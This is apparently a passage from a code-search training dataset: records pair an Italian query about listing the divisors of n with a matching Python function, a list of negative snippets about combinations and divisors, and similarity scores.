sorted(arguments)\n combinations = itertools.product(*(arguments[arg] for arg in arg_names))\n combinations = [dict(zip(arg_names, arg_values)) for arg_values in combinations]\n return combinations", "def letterCombinations(self, digits: str) -> [str]:\n return Combinations(digits).ans", "def linear_combination(n):\n weighs = (1, 3, 9, 27)\n\n for factors in factors_set():\n sum = 0\n for i in range(len(factors)):\n sum += factors[i] * weighs[i]\n if sum == n:\n return factors", "def age_combinator(arbitrary_age):\n age_combination = 0\n for age in arbitrary_age:\n str_age = str(age)\n for a in str_age:\n age_combination += int(a)\n return age_combination", "def equipment_combinations(weapons, armor, rings):\n weapon_choices = item_combinations(weapons, range(1, 2))\n armor_choices = item_combinations(armor, range(2))\n ring_choices = item_combinations(rings, range(3))\n complete_choices = itertools.product(weapon_choices, armor_choices, ring_choices)\n return complete_choices", "def indicated_combinations(n, k):\n # - This singleton list is mutated and yielded, in order not to waste too\n # much memory.\n # - * is safe as integers are immutable\n # - I'm using integers so it's easier to skim when debugging\n indicator = [0] * n\n for combination in combinations(range(n), k):\n for i in combination:\n indicator[i] = 1\n yield indicator\n for i in combination:\n indicator[i] = 0", "def pair_combos(iterable):\n pairs = set()\n for a in iterable:\n for b in iterable:\n pairs.add(a + b)\n return list(pairs)", "def comb(set, n):\n if len(set) < n:\n raise Exception(\"Not enough elements\")\n elif len(set) == n:\n yield set\n else:\n setLen = len(set)\n iters = [rangeIter(setLen - n + 1)]\n values = [0] * n\n values[0] = iters[0].next()\n level = 1\n while True:\n # Fill array of iterators back up\n while level < n:\n iters.append(rangeIter(values[level - 1] + 1,\n setLen - n + level + 1))\n values[level]=iters[level].next()\n level += 1\n subset = [set[i] for i in values]\n yield subset\n while True:\n try:\n values[level - 1] = iters[level - 1].next()\n break\n except StopIteration:\n iters.pop()\n level -= 1\n if level == 0:\n # Top-level iterator is done, so we are too\n raise StopIteration", "def combinations(sequence, length, NULL=object()):\r\n if length <= 0:\r\n combos = [NULL]\r\n else:\r\n combos = []\r\n for i, item in enumerate(sequence, 1):\r\n rem_items = sequence[i:]\r\n rem_combos = combinations(rem_items, length-1)\r\n combos.extend(item if combo is NULL else [item, combo]\r\n for combo in rem_combos)\r\n return combos", "def generate_option_combos(self):\n available_options = list()\n for option in self.options:\n # generate a list of dicts for every value of the option\n tmp = list()\n for value in option.values:\n tmp.append({option.name: value})\n\n available_options.append(tmp)\n\n # generate a list of tuples for each product option combination\n option_combos = list(itertools.product(*available_options))\n\n return option_combos", "def triplets():\n for a in xrange(1, 1000):\n for b in xrange(a, 1000):\n c = 1000 - (a + b)\n if a**2 + b**2 == c**2:\n return a, b, c", "def digit_permutations(n):\n if n != 0:\n return set([int(''.join(p)) for p in permutations(str(n)) if p[0] != '0'])\n else:\n return {0}", "def get_all_comb(array, r=None):\n if r is None:\n r = len(array)\n return [_ for i in range(1, r + 1) for _ in itertools.combinations(array, i)]", "def get_perms(n):\n \n from itertools import permutations\n bases = 'CATGN'\n return [''.join(perm) for perm in permutations(bases, n)]", "def iter_combos(include_unknown=False):\n if include_unknown:\n return _combos\n else:\n return _combos[:-7]", "def check1800(s):\n num_translation = str.maketrans(\n 'ABCDEFGHIJKLMNOPQRSTUVWXYZ', '22233344455566677778889999')\n nums_dict = defaultdict(list)\n for word in WORDS:\n nums_dict[word.translate(num_translation)].append(word)\n\n number = s[6:].replace('-', '').translate(num_translation)\n\n # we take the cartesian product of all the options for the first word and all the options for the second.\n\n # case 1, first word is 3 letter & second is 4 letter\n possibilities1 = {'1-800-{}-{}'.format(*poss) for poss in it.product(\n nums_dict[number[:3]], nums_dict[number[3:]])}\n\n # case 2, first word is 4 letter & second is 3 letter\n possibilities2 = {'1-800-{}-{}'.format(*poss) for poss in it.product(\n nums_dict[number[:4]], nums_dict[number[4:]])}\n\n return possibilities1.union(possibilities2)", "def get_chunk_combination(indiv_1, indiv_2, pair_1, pair_2):\t\r\n\tif check_fixed(indiv_1):\r\n\t\treturn [[indiv_1+indiv_2, indiv_1+indiv_2]] if check_fixed(indiv_2) else [[indiv_1+pair_2[0], indiv_1+pair_2[1]]]\r\n\telse:\r\n\t\treturn [[pair_1[0]+indiv_2, pair_1[1]+indiv_2]] if check_fixed(indiv_2) else [[pair_1[0]+pair_2[0], pair_1[0]+pair_2[1]], [pair_1[1]+pair_2[0], pair_1[1]+pair_2[1]]]\r\n\treturn res", "def split_candy(case):\n\n s_best_sum = 0\n\n# print case\n if len(case) <= 1:\n return \"NO\"\n\n # annotate values to protect against duplicates\n annotated_case = [ (i, x) for i,x in enumerate(case) ]\n# print annotated_case\n\n for length in range(1, len(annotated_case)):\n for s_pile in itertools.combinations(annotated_case, length):\n p_pile = set(annotated_case).difference(s_pile)\n\n # unzip\n s_pile = zip(*s_pile)[1]\n p_pile = zip(*p_pile)[1]\n\n# print s_pile, p_pile\n\n s_sum = reduce(lambda x, y: x+y, s_pile)\n s_xor = reduce(lambda x, y: x^y, s_pile)\n p_xor = reduce(lambda x, y: x^y, p_pile)\n\n# print s_pile, s_sum, s_xor, p_pile, p_xor\n if s_xor == p_xor:\n# print \"match\"\n s_best_sum = max(s_sum, s_best_sum)\n\n return s_best_sum or \"NO\"", "def password(A: List, N: int) -> List:\n # Allocate list members into buckets of length\n dct = {i:[] for i in range(1, max([len(a) for a in A]) + 1)}\n for a in A:\n dct[len(a)] += [a]\n\n combo = [None] * (N + 1)\n\n if dct.get(1):\n combo[1] = [tuple([1])]\n \n if dct.get(2):\n combo[2] = [tuple([2])]\n\n # Apply dynamic programming to discover the possible configurations to\n # achieve the desired pass word length. Use list position indexing\n for i in range(3, N + 1):\n ctr = []\n for j in range(1, (i//2) + 1):\n ctr.append([tuple(\n itertools.chain(*ea)) for ea in itertools.product(\n combo[i-j-1], combo[j])])\n\n if dct.get(i):\n combo[i] = list(itertools.chain(*ctr, [tuple([i])]))\n else:\n combo[i] = list(itertools.chain(*ctr))\n\n # For all configurations that are applicable to a given password length,\n # generate all password outputs through a product operation between all\n # members\n tracker = {}\n output = []\n for cmb in set(combo[-1]):\n sig = set([ea for ea in itertools.permutations(cmb)])\n\n for sg in sig:\n if tracker.get(sg):\n continue\n\n tracker[sg] = 1\n output += [\n '_'.join(x) for x in itertools.product(*[dct[s] for s in sg])]\n\n return output", "def tc_gen(n):\r\n comb = (list(tuple) for tuple in itertools.product([True,False], repeat=n))\r\n return list(comb)", "def powerset(n):\n # chain r-combinations generator for r=0, 1,..., n\n return chain.from_iterable(combinations(range(n), r) for r in range(n+1))", "def pairs_of_factors(n):\n seq = factor(n)\n # indexes into seq\n i = set(range(len(seq)))\n # create pairs of subsets indexes into seq and their complements\n ps = [(ss, i-ss) for ss in powerset(i) if 0 in ss and ss<i]\n return frozenset(\n tuple(sorted((prod(seq[i] for i in a), prod(seq[i] for i in b))))\n for a, b in ps)", "def zero_comb(num_list):\n return {tuple(sorted(n)) for n in combinations(num_list, 3) if sum(n) == 0}", "def get_sub_combinations(maxop):\n combo = collections.defaultdict(list)\n for numops in range(maxop+1):\n if numops:\n combo[numops, 1].append((numops-1,))\n for op1 in range(numops):\n combo[numops, 2].append((op1, numops - op1 - 1))\n for op2 in range(numops - op1):\n combo[numops, 3].append((op1, op2, numops - op1 - op2 - 1))\n return combo", "def euler24():\n\n # import math\n # math.factorial(10) = 3628800, 3.6 million combinations\n # math.factorial(9) = 362880, so the first digit is '2'\n\n import time\n start = time.time()\n\n p = 10 \n limit = 1000000-1\n result = []\n\n LIST = [0,1,2,3,4,5,6,7,8,9]\n\n\n # higest digit, 10! permutations in total\n while p > 0:\n l = len(result)\n m, r = divmod(limit, math.factorial(p-1))\n result.append(LIST[m])\n LIST.remove(LIST[m]) # remove first element with VALUE LIST[m]\n limit -= m * math.factorial(p-1)\n p -= 1\n\n end = time.time()\n print \"Time:\" , (end-start)*1000 , \"ms\"\n \n return result", "def __get_all_combinations(self, list_of_items):\r\n return [itertools.combinations(list_of_items, index+1)\r\n for index in range(len(list_of_items))]", "def permutations(value):\n seen = {value}\n possible = calulate_total_permutations(value)\n yield value\n LOG.info(\"%s has %s possible combinations\", value, possible)\n while True:\n if len(seen) >= possible:\n break\n anagram = shuffle_str(value)\n while True:\n if anagram not in seen:\n seen.add(anagram)\n break\n anagram = shuffle_str(anagram)\n yield anagram", "def Allcombos():\n\n global allcombos\n\n allcombos = []\n\n results = product(\"ABCDEF\", repeat=4)\n\n allcombos = resulttolist(results)\n\n return AIguessing(allcombos)", "def trivial_phase(indivs):\r\n\tpool=make_pool(len(indivs[0]))\r\n\r\n\tfor i in xrange(1,len(pool)+1):\r\n\t\tall_combi=itertools.combinations(pool,i)\r\n\t\tfor t in all_combi:\r\n\t\t\tt+=t\r\n\t\t\tcandidate_couples=list(itertools.combinations(t,2))\r\n\t\t\tgeno_list=map(lambda x: mix(x[0],x[1]), candidate_couples)\r\n\t \t\tif check(indivs, geno_list):\r\n\t \t\t\treturn list(set(t)), candidate_couples\r\n\tprint \"It's impossible to execute this, something must be wrong.\"", "def triplets(a, b, c):\n a = list((set(a)))\n a.sort()\n b = list((set(b)))\n b.sort()\n c = list((set(c)))\n c.sort()\n\n ai = 0\n bi = 0\n ci = 0\n ans = 0\n\n while bi < len(b):\n # this is the useful part ofthe code: nested while loops\n while ai < len(a) and a[ai] <= b[bi]:\n ai += 1\n\n while ci < len(c) and c[ci] <= b[bi]:\n ci += 1\n\n ans += ai * ci\n bi += 1\n\n return ans", "def generate_combinations(rack,placed_tile):\n combinations_set = set()\n if placed_tile == \"\":\n for i in range(3, (len(rack)+1)):\n for x in itertools.combinations(rack, i):\n combinations_set.add(x)\n else:\n word = rack+placed_tile\n for i in range(3, (len(word)+1)):\n for x in itertools.combinations(word, i):\n if placed_tile in x:\n combinations_set.add(x)\n \n return combinations_set", "def comb(n, k):\n return perm(n,k)/factorial(k)", "def _get_possible_sense_combinations(self, taggable, tagged):\n\t\tprint(\"\\tget possible combinations...\")\n\t\t# first create a list of the already tagged senses and store for each of those one list inside that contains the one single correct sense\n\t\ttagged_sense_keys = [[(token, token.wn_sense_key)] for token in tagged]\n\t\ttaggable_possible_sense_keys = []\n\n\t\t# for each token that has to be tagged now find all possible senses and collect them\n\t\tfor token in taggable:\n\t\t\ttoken_sense_pairs = []\n\t\t\t# for each possible sense of the token add one to the list of that sense\n\t\t\tpossible_senses = self._get_possible_wn_senses_for_token(token)\n\t\t\tfor single_possible_sense in possible_senses:\n\t\t\t\ttoken_sense_pairs.append((token, single_possible_sense))\n\t\t\ttaggable_possible_sense_keys.append(token_sense_pairs)\n\n\t\tcomplete_list_of_tokens = taggable_possible_sense_keys + tagged_sense_keys\n\n\t\tprint(\"\\t\\t...building combinations\")\n\t\t# return a dot product of the lists of possible senses of all tokens\n\t\treturn list_product(*complete_list_of_tokens)", "def generate_true_combinations(data):\n true_combinations = []\n for group in data:\n for i in range(len(group)):\n for j in range(i, len(group)):\n true_combinations.append((group[i], group[j], 1))\n return true_combinations", "def compute_combinations(items: List[Union[List[Any], Tuple]], n: int) -> List[List[Any]]:\n return [chunks[i:i + n] for chunks in items for i in range(len(chunks) - (n - 1))]", "def combinations(*args: List[Any]) -> List[List]:\n return list([list(el) for el in list(product(*args))])", "def pathCombinations(A,compnts):\n linkOpt = []\n pSize = len(compnts)\n #Variable to keep track of number of nodes in the branch\n nNodes = 1\n\n #Find the links between each adjacent component in the path\n for i in range(pSize-1):\n rows,cols = np.where(A[compnts[i+1],:][:,compnts[i]]==1)\n if i == 0:\n cols += compnts[0]\n rows += nNodes\n elif i == pSize-2:\n rows += compnts[-1]\n cols += nNodes - len(compnts[i])\n else:\n rows += nNodes\n cols += nNodes - len(compnts[i])\n edges = zip(rows,cols)\n nNodes += len(compnts[i+1])\n linkOpt.append(edges)\n\n allPaths = [list(P) for P in itertools.product(*linkOpt)]\n return allPaths", "def get_combo(un_lit):\n\n done_lit = []\n li_count = len(un_lit)\n\n for letter in un_lit: # for each letter in the provided\n placeholder = 0\n for num in range(li_count) # for each pos in list\n if letter.index == placeholder:\n temp_lit = \n\n elif letter.index > placeholder:\n \n elif letter.index < placeholder:\n\n done_lit.append(temp_lit)\n placeholder += 1", "def power_set(A):\n\n L = list()\n for i in range(len(A) + 1):\n L.extend([set(j) for j in itertools.combinations(A, i)])\n return L\n\n raise NotImplementedError(\"Problem 4 Incomplete\")", "def get_subs(n):\n \n from itertools import product\n return [''.join(sub) for sub in product('CATGN', repeat=n)]", "def powerset(iterable):\n\n s = list(iterable)\n\n return chain.from_iterable(combinations(s, r) for r in range(2, len(s) + 1))", "def generate_permutations(numbers):\n\n permutations = list()\n temp = list()\n # Generate all possible permutations of numbers and plusses, record\n # the number of plus signs as cost.\n for i, num in enumerate(numbers):\n # Base case, append the number and cost of 0\n if i == 0:\n permutations.append((num, 0))\n else:\n # Iterate through permutations, appending new items to temp.\n # Strings can be permutated two ways: string + char,\n # string + '+' + char\n for item in permutations:\n temp.append((item[0] + num, item[1]))\n temp.append((item[0] + '+' + num, item[1] + 1))\n # Now we move temp to permutations and clear out temp.\n permutations = temp\n temp = list()\n return permutations", "def make_combinations(items):\n\n def inner(items, r):\n \"\"\"\n recursively yields partitioned remainders of original partition lists\n \"\"\"\n items = set(items)\n if not len(items):\n yield ()\n return\n first = next(iter(items))\n remainder = items.difference((first, ))\n for combination in combinations(remainder, r-1):\n first_subset = (first, ) + combination\n for partition in inner(remainder.difference(combination), r):\n yield (first_subset, ) + partition\n\n def outter(items, r):\n \"\"\"\n combines partition lists\n \"\"\"\n items = set(items)\n for i in range(len(items), -1, -r):\n if i == 0:\n for partition in inner(items, r):\n yield partition\n elif i != r:\n for combination in combinations(items, i):\n for partition in inner(items.difference(combination), r):\n yield partition + (combination, )\n\n # step through length of origin combination partitions to ensure full list\n for i in range(1, len(items)):\n gen = outter(items, i)\n for row in gen:\n yield row", "def get_all_possible_pairs(self, a, b):\n return itertools.product(a, b)" ]
[ "0.718348", "0.7005977", "0.6993959", "0.6917465", "0.6894283", "0.68004334", "0.67992324", "0.6771768", "0.67690665", "0.67308486", "0.6717386", "0.6692334", "0.667273", "0.66375154", "0.6628557", "0.6606142", "0.6602187", "0.65536106", "0.65413445", "0.6535008", "0.6530812", "0.64041907", "0.63964874", "0.63782644", "0.6339572", "0.63310623", "0.6321383", "0.6311408", "0.6287866", "0.62618333", "0.62327105", "0.622931", "0.62249297", "0.6197499", "0.6179319", "0.61552364", "0.61477226", "0.6147307", "0.614649", "0.61275136", "0.6089535", "0.60862756", "0.6079543", "0.6064233", "0.6055616", "0.6045676", "0.6041457", "0.6030775", "0.60284156", "0.60125893", "0.6008318", "0.59997535", "0.59943986", "0.59921587", "0.5985615", "0.5982762", "0.5968849", "0.59669524", "0.5948483", "0.59463745", "0.5915645", "0.5913698", "0.59083724", "0.5899219", "0.5857751", "0.58463544", "0.5842965", "0.5839806", "0.58260643", "0.5820989", "0.5819658", "0.5818484", "0.58144724", "0.58143413", "0.58055115", "0.5792867", "0.5792031", "0.57735527", "0.5770609", "0.57669526", "0.5761522", "0.5761139", "0.57537544", "0.57519275", "0.5750886", "0.57413024", "0.57391673", "0.5738384", "0.57332855", "0.57287335", "0.5722744", "0.57224214", "0.5707022", "0.5705601", "0.5697942", "0.56862825", "0.5675446", "0.56629074", "0.56585854", "0.5653505" ]
0.5852057
65
Fornisce i divisori di n
def divisori(n): div=set() for i in range(1,int(n**0.5+1)): if n%i==0: div.add(int(n/i)) div.add(i) return sorted(div)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getDivisors(n):", "def diviseur(n):\n s = 0\n for i in range (1, n):\n if n%i == 0:\n s += 1\n print(i)\n return \"Le nombre de diviseurs est\", s", "def divisior(n: int) -> list:\n j = [n]\n for d in range(n+1): #loop bis n\n d > 0", "def getNumDivisors(n):\n\n n = abs(int(n))\n\n r = 1\n i = 2\n while i <= n:\n a = 0\n while n % i == 0:\n n = n / i\n a = a + 1\n r = r * (a + 1)\n i = i + 1\n\n return r", "def d(n):\n divisors = []\n for i in range(1, n):\n if n % i == 0:\n divisors.append(i)\n return sum(divisors)", "def make_division_by(n):\n\n def division(x):\n assert type(x) == int, \"You can only use integers\"\n return x / n\n\n return division", "def make_division_by(n):\n def division(x):\n assert x != 0, 'Denominator can\\'t be zero'\n return x / n\n return division", "def make_division_by(n):\n assert type(n) in [int, float], \"n must be a number\"\n assert n != 0, \"division by zero is not allowed\"\n\n def divider(x):\n assert type(x) in [int, float], \"x must be a number\"\n return x / n\n\n return divider", "def proper_divisors(n):\n divisors = set([1])\n for i in range(2, int(ceil(sqrt(n)))+1):\n if n % i == 0:\n divisors.add(i)\n divisors.add(n/i)\n return divisors", "def d(n):\n return sum(divisors(n))", "def proper_divisors(n):\r\n numbers = []\r\n for i in xrange(1, n):\r\n if n % i == 0:\r\n numbers.append(i)\r\n \r\n return numbers", "def division_euclidienne(n1, n2):", "def divisors(n):\n dvs = []\n for i in range(1, int(math.sqrt(n)) + 1):\n if n % i == 0:\n dvs.append(i)\n j = n / i\n if j != i:\n dvs.append(j)\n\n dvs.remove(n)\n return dvs", "def sum_of_proper_divisors(n):\n\n\tpd = find_divisors(n)\n\n\treturn sum(pd)", "def num_divisors_iii(n):\n set_pf = set(n)\n n_div = 1\n for pf in set_pf:\n x = n.count(pf)\n n_div *= (1 + x)\n return n_div", "def sum_proper_divisors(n):\r\n return sum(proper_divisors(n))", "def count_proper_divisors(n):\r\n if n == 1:\r\n return 0\r\n m = int(sqrt(n))\r\n c = 1\r\n if m * m == n:\r\n c += 1\r\n m -= 1\r\n for i in xrange(2, m+1):\r\n if n % i == 0:\r\n c += 2\r\n return c", "def get_divisors(n, includeN=True):\n lower_divisors, upper_divisors = [], []\n i = 1\n while i * i <= n:\n if n % i == 0:\n lower_divisors.append(i)\n if i != n // i:\n upper_divisors.append(n//i)\n i += 1\n upper_divisors = upper_divisors[::-1]\n if not includeN:\n upper_divisors.pop()\n return lower_divisors + upper_divisors", "def num_divisors_ii(n):\n set_pf = set(n)\n n_og = 2**(len(set_pf))\n n_div = n_og\n for pf in set_pf:\n x = n.count(pf)\n n_div += n_div//2 * (x - 1)\n return n_div", "def make_division_by(n):\n def second_parameter(x):\n return round(x / n, 1)\n \n return second_parameter", "def properdivisors(n):\n propdiv = [1]\n start, step = [2, 1]\n\n # Odd numbers only have odd divisors\n if n % 2 == 1:\n start, step = [3, 2]\n\n for i in range(start, ceil(sqrt(n)), step):\n if n % i == 0:\n propdiv.extend([i, n//i])\n\n # If n is a perfect square, also add the square root.\n # Note: this does not work for VERY LARGE n.\n if sqrt(n).is_integer() and n != 1:\n propdiv.append(int(sqrt(n)))\n\n return(propdiv)", "def proper_divisors(n):\n l = [1]\n if n == 1 or n == 2:\n return l\n else:\n limit = math.floor(n/2) + 1\n for i in range(2, limit):\n if n % i == 0:\n l.append(i)\n return l", "def divide_by_fact(dividend, n):\n if n <= 0:\n \treturn dividend\n return divide_by_fact(dividend / n, n - 1)", "def num_divisors(n):\n divisors = []\n for i in range(1, int(n**0.5) + 1):\n if n % i == 0:\n divisors += {i, n //i}\n return divisors", "def divisors(n):\r\n numbers = []\r\n for i in xrange(1, n+1):\r\n if n % i == 0:\r\n numbers.append(i)\r\n return numbers", "def sum_divisors(n):\r\n return sum(proper_divisors(n)) + n", "def prime_division(n):\n primes = primes1(int(math.sqrt(n)))\n for prime in reversed(primes):\n if n % prime == 0:\n print((prime, int(n/prime)))\n return (prime, int(n/prime))", "def trial_div(n: int) -> bool:\n if n == 1:\n return False\n i = 2\n while i**2 <= n:\n if n % i == 0:\n return False\n i += 1\n return True", "def get_divisors(n):\n n = abs(n)\n divisors = []\n for i in range(1, int(n**0.5)+1):\n if n%i == 0:\n divisors.append(i)\n divisors.append(-i)\n if i*i != n:\n divisors.append(n//i)\n divisors.append(-n//i)\n return sorted(divisors, key=abs)", "def divisors(n):\n return [x for x in range(1, n) if n % x == 0]", "def is_primary_trivial_division(n):\n mod = int(math.sqrt(n))\n for _ in xrange(2, mod + 1):\n if n % _ == 0:\n return 0\n return n", "def num_divisors(n):\n\tif n < 2:\n\t\treturn 1 \t# not really correct\n\t\n\tdivisors = 1\n\ti = 2\n\n\twhile n > 1:\n\t\tp = 0 \t# p will be the maximum x such that i^x evenly divides n\n\n\t\t# repeatedly divide n by i, and store the number of times into p\n\t\twhile (n % i == 0):\n\t\t\tn = n / i\n\t\t\tp += 1\n\n\t\tdivisors = divisors * (p + 1)\n\t\ti += 1\n\n\treturn divisors", "def find_divisors(n):\n\n\tpd = [1]\n\n\tsqrtN = int(math.sqrt(n))\n\n\tfor d in range(2, sqrtN+1):\n\t\tif n % d == 0:\n\t\t\tpd.append(d)\n\t\t\tpair = int(n/d)\n\t\t\tif not pair == d:\n\t\t\t\tpd.append(pair)\n\n\treturn pd", "def divisors(n):\n return tuple(_divisor_gen(n))", "def properDivisors(n):\n facs = [1]\n fac = 2\n while fac*fac <= n:\n if n%fac == 0:\n facs.append(fac)\n if fac*fac != n:\n facs.append(n/fac)\n fac += 1\n return facs", "def properDivisors(n):\n facs = [1]\n fac = 2\n while fac*fac <= n:\n if n%fac == 0:\n facs.append(fac)\n if fac*fac != n:\n facs.append(n/fac)\n fac += 1\n return facs", "def find_divisors(n: int) -> Set[int]:\n divisors = {1, n}\n for i in range(2, int(n ** 0.5) + 1):\n if n % i == 0:\n divisors.add(i)\n divisors.add(n // i)\n return divisors", "def count_divisors(n):\r\n if n == 1:\r\n return 0\r\n m = int(sqrt(n))\r\n c = 1\r\n if m * m == n:\r\n c += 1\r\n m -= 1\r\n for i in xrange(2, m+1):\r\n if n % i == 0:\r\n c += 2\r\n return c", "def divisors(n):\n d = []\n for i in range(1, int(math.sqrt(n) + 1)):\n if n % i == 0:\n d.append(i)\n d.append(n / i)\n return set(d)", "def count_divisions(num, n):\n count = 0\n while pe_005.is_divisible(num, n):\n num = num // n\n count += 1\n return count, num", "def is_div(n, m):\n # check if remainder\n return math.fmod(n, m)==0", "def divide(n1, n2):\n return n1 / n2", "def sumPropDiv(n):\n dSum = 0\n for x in range(1, int(n/2 + 1)):\n if n % x == 0:\n dSum += x\n return dSum", "def is_divisible(num, n):\n return num % n == 0", "def divisors(n: int) -> list:\n # iterate through every number <= n/2 and check whether the number is a divisor\n # append to list if not in list\n # in the end, append the number\n divs = [n]\n for i in range(1, n//2 + 1):\n if n % i == 0:\n divs.append(i)\n return divs", "def div2(x):\n if odd(x):\n x += n\n return x // 2 % n", "def proper_divisors(n: int) -> [int]:\n\n if n == 1:\n return []\n\n x = 2\n divisors = set([1])\n while x * x <= n and n > 1:\n if n % x == 0:\n divisors.add(x)\n divisors.add(n // x)\n\n x += 1\n\n s = sorted(divisors)\n return s", "def divide_exact(n,d):\n return floordiv(n,d),mod(n,d)", "def divisors(N):\n # Initialize the list of divisors\n divisor_list = [1]\n # Check division by d for d <= N/2\n for d in range(2,N // 2 + 1):\n if N % d == 0:\n divisor_list.append(d)\n divisor_list.append(N)\n return divisor_list", "def find_proper_divisors(n: int) -> Set[int]:\n\n divisors = find_divisors(n)\n return divisors - {n} # without n", "def div_numbers(a: int, b: int) -> int:\n return a / b", "def divisors(n):\n divs = [1]\n for p, e in factorization(n):\n divs += [x*p**k for k in range(1,e+1) for x in divs]\n return divs", "def division_algorithm(n):\n assert n < 1000\n decimals = []\n dividend = 1\n divisor = n\n counter = 0\n repeating, repeating_length = False, 0\n while dividend != 0 and not repeating:\n dividend = dividend * 10\n decimals.append(dividend // divisor)\n dividend = dividend % divisor\n counter += 1\n repeating, repeating_length = is_repeating(decimals)\n if repeating:\n counter = repeating_length\n return repeating, counter", "def factors(n):\n for x in range(1,n+1):\n if n % x == 0:\n print(x)", "def div(a,b):\r\n return a/b", "def d(n):\n rt = math.sqrt(n)\n i = 2\n result = 1\n while i < rt:\n if n % i == 0:\n result += i\n result += n // i\n i += 1\n\n # i == rt implies that n is a square number\n if i == rt and n % i == 0:\n result += i\n return result", "def div(num1, num2):\n return num1 / num2", "def div(num1, num2):\n return num1 / num2", "def div(self):\n a = self.nums()\n x = LibraryFunctions.per(a, 0.9) - LibraryFunctions.per(a, 0.1)\n return x / 2.58", "def divisible_by(n):\n return lambda x: x % n == 0", "def divisible_by(n):\n return lambda x: x % n == 0", "def div_by(n, list_of_num):\n for num in list_of_num:\n if not n % num:\n return True\n return False", "def n_photon_counting_div(self):\n inti = ct.c_ulong()\n self.lib.GetNumberPhotonCountingDivisions(ct.pointer(inti))\n return inti.value", "def evansMod(x,n):\n if x%n == 0:\n return 1\n else:\n return 0", "def get_divisores(num):\n divisores = [] #uso una lista para guardar los divisores\n for i in range(1, num):\n if num%i == 0:\n divisores.append(i)\n return divisores", "def fractionify(n):\n i = 0\n while True:\n if not n * 10 ** i % 1:\n break\n i += 1\n return n * 10 ** i, 10 ** i", "def snt(n):\r\n f = True\r\n for j in range(2, n):\r\n if n % j == 0:\r\n f = False\r\n break\r\n return f", "def smallest_number_divisible(n):\n\tprime_numbers = generate_prime_less_than_n(n)\n\tlog_n = math.log(n)\n\tres = 1\n\tfor pi in prime_numbers:\n\t\tres *= math.pow(pi, math.floor(log_n/math.log(pi)))\n\treturn res", "def findDivisors(n1, n2):\n divisors = () # the empty tuple\n for i in range(1, min(n1, n2) + 1):\n if n1%i == 0 and n2%i == 0:\n divisors = divisors + (i,)\n return divisors", "def factor(n):\n\n f = []\n\n for i in xrange(1, int(round(sqrt(n)))+1):\n if n%i == 0:\n f.append(i)\n f.append(n/i)\n\n return f", "def list_of_divisibles(n):\n def is_prime(x, L = []):\n if x in L or x == 2:\n return True\n elif x == 1 or x % 2 == 0:\n return False\n for divisor in range(1, round(x ** .5)):\n if is_prime(divisor, L):\n if x % divisor == 0:\n return False\n return True\n \n def largest_exponent(i, n):\n \"\"\"\n Given a limit n and a base i, finds the largest exponenet x such that i ^ x <= n, and outputs i ^ x.\n\n \"\"\"\n x = 1\n while i ** x <= n:\n x += 1\n x -= 1\n print(i, x, i**x)\n return i ** x\n \n L = []\n for i in range(2, n+1):\n if i in L:\n continue\n elif is_prime(i):\n L.append(largest_exponent(i, n))\n return L", "def longDivNoLimit(c, e, ns, n):\n if n == 0:\n return (Scientific(c, e), Nothing)\n else:\n e_prime = map.lookup(n, ns)\n if isJust(e_prime):\n return (Scientific(c, e), maybe.map(negate, e_prime))\n elif n < rat.denominator:\n return longDivNoLimit(c * 10, e - 1, map.insert(n, e, ns), n * 10)\n else:\n (q, r) = quotRemInteger(n, rat.denominator)\n return longDivNoLimit(c + q, e, ns, r)", "def set_photon_counting_divs(self, n, thres):\n thres = ct.c_long(thres)\n self.lib.SetPhotonCountingDivisions(ct.c_ulong(n), ct.pointer(thres))", "def sum_of_proper_divisors(number: int):\n divisors = []\n\n for n in range(1, number):\n if number % n == 0:\n divisors.append(n)\n\n return sum(divisors)", "def eq_div(N, i):\n return [] if i <= 0 else [N // i + 1] * (N % i) + [N // i] * (i - N % i)", "def factorPR(n):\r\n\tfor slow in [2,3,4,6]:\r\n\t\tnumsteps=2*math.floor(math.sqrt(math.sqrt(n))); fast=slow; i=1\r\n\t\twhile i<numsteps:\r\n\t\t\tslow = (slow*slow + 1) % n\r\n\t\t\ti = i + 1\r\n\t\t\tfast = (fast*fast + 1) % n\r\n\t\t\tfast = (fast*fast + 1) % n\r\n\t\t\tg = gcd(fast-slow,n)\r\n\t\t\tif (g != 1):\r\n\t\t\t\tif (g == n):\r\n\t\t\t\t\tbreak\r\n\t\t\t\telse:\r\n\t\t\t\t\treturn g\r\n\treturn 1", "def the_division_is_aimed(numb1, numb2):\r\n return f\"Your result: {numb1//numb2}\"", "def faculteit_iteratief(n):\n res = 1\n\n # Voeg de iteratie in: for ...\n\n return res", "def findDivisor(num):\n divisors = [1]\n for i in range(2, int(sqrt(num)) + 1):\n if num % i == 0:\n divisors.append(i)\n temp = num / i\n if temp != i:\n divisors.append(temp)\n return divisors", "def list_of_divisors_v1(n):\n \"\"\"\n This is a slow algorithm. But it is correct.\n \"\"\"\n if n == 1:\n return [1]\n if n == 2:\n return [1,2]\n L = {}\n if n > 0:\n L[1] = True\n if n > 1:\n L[n] = True\n for i in list_of_prime_factors(n):\n L[i] = True\n for j in list_of_divisors(n // i):\n L[j] = True\n return L.keys()", "def n():\n # For documentation purposes", "def longDiv(c, e, n):\n if n == 0:\n return Scientific(c, e)\n else:\n # TODO: Use a logarithm here!\n # TODO: Can't use tail recursion like this in python!\n if n < d:\n return longDiv(c * 10, e - 1, n * 10)\n else:\n (q, r) = quotRemInteger(n, d)\n return longDiv(c+q, e, r)", "def div(a, b):\n\n c = 0\n d = b\n while True:\n if d > a:\n break\n else:\n c = c + 1\n d = d + b\n\n return c", "def div(x, y):\n return x / y", "def list_of_divisors_v2(n):\n return list(divisorGen(n))", "def gatherDivisors(number): # prvni string ve funkci je comment; \"\"\" znamenam ze je na vic radek\n\tdivisors = []\n\tfor div in range(1, number + 1): # range vyhodi vse od jedne az do number\n\t\tif number % div == 0:\n\t\t\tdivisors.append(div)\n\treturn divisors", "def d(n):\n if n not in d_memo:\n # Start with 1 so n isn't counted\n total = 1\n # Loop from 2 to sqrt(n)\n for i in xrange(2, int(n**0.5) + 1):\n if n % i == 0:\n total += i\n # Only add the other divisor if it isn't a square\n if i * i != n:\n total += n/i\n\n d_memo[n] = total\n\n return d_memo[n]", "def prime_divisors(n):\r\n\treturn list(set(factors(n)))", "def divisor (a,b):\n return a/b #i output a value by using the return statement", "def dividir(self):\n self.resultado = self.valor_1 / self.valor_2", "def __rdiv__(self, number):\n return self.__div__(number)", "def prime_divisors(n):\n\treturn tuple(set(factors(n)))", "def finddiv(x):\r\n \r\n div = (1, x)\r\n for i in range(2, 